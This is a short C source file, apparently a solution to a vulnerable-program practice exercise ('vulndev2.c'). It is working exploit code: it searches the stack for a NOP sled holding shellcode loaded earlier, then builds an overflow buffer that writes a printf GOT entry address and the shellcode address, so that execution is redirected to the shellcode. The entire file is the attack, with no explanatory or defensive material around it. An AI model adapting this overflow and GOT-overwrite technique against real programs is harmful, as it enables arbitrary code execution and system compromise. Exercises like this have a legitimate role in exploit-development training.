/* exploit for vulndev2.c
 * easy peasy
 * -ex0 @ cpimps
 */

#include <stdio.h>
#include <stdlib.h>

#define	PUT_ADDR(addr, val) {  \
	*(char *)(addr) = (val) & 0xff; \
	*(char *)((addr) + 1) = ((val) >> 8) & 0xff; \
	*(char *)((addr) + 2) = ((val) >> 16) & 0xff; \
	*(char *)((addr) + 3) = ((val) >> 24) & 0xff; \
	}

#define BSIZE 90

unsigned long get_sp(void);

int main(int argc, char *argv[]) {
	char arg1[BSIZE + 8];
	char arg2[8];
	char *p;
	int i;
	int skip = 0;
	int retloc;
	int retaddr;

	if(argc < 2) {
		fprintf(stderr, "usage: %s <printf GOT> [<skip>]\n", argv[0]);
		exit(0);
	}

	sscanf(argv[1], "%x", &retloc);
	if(argc == 3) {
		sscanf(argv[2], "%d", &skip);
		fprintf(stderr, "skipping %d bytes\n", skip);
	}

	/* lame */
	p = (char *)get_sp();
	while((i = strncmp(p, "\x90\x90\x90\x90", 4)) != 0 && p < (char *)0xbfffffff) p++;
	if(i != 0) {
		fprintf(stderr, "load shellcode into memory first! (remember to pad with some nops)\n");
		exit(0);
	}
	(char *)retaddr = p;

	fprintf(stderr, "using retloc: 0x%x - retaddr: 0x%x\n", retloc, retaddr);

	memset(arg1, 'A', sizeof(arg1));
	PUT_ADDR(arg1 + BSIZE + skip, retloc - 2);

	memset(arg2, 0x00, sizeof(arg2));
	PUT_ADDR(arg2, retaddr);

	fprintf(stderr, "exploitation buffer ready\n");
	printf("%s %s\n", arg1, arg2);

	return;
}

unsigned long get_sp(void) {
	__asm__ ("movl %esp, %eax");
}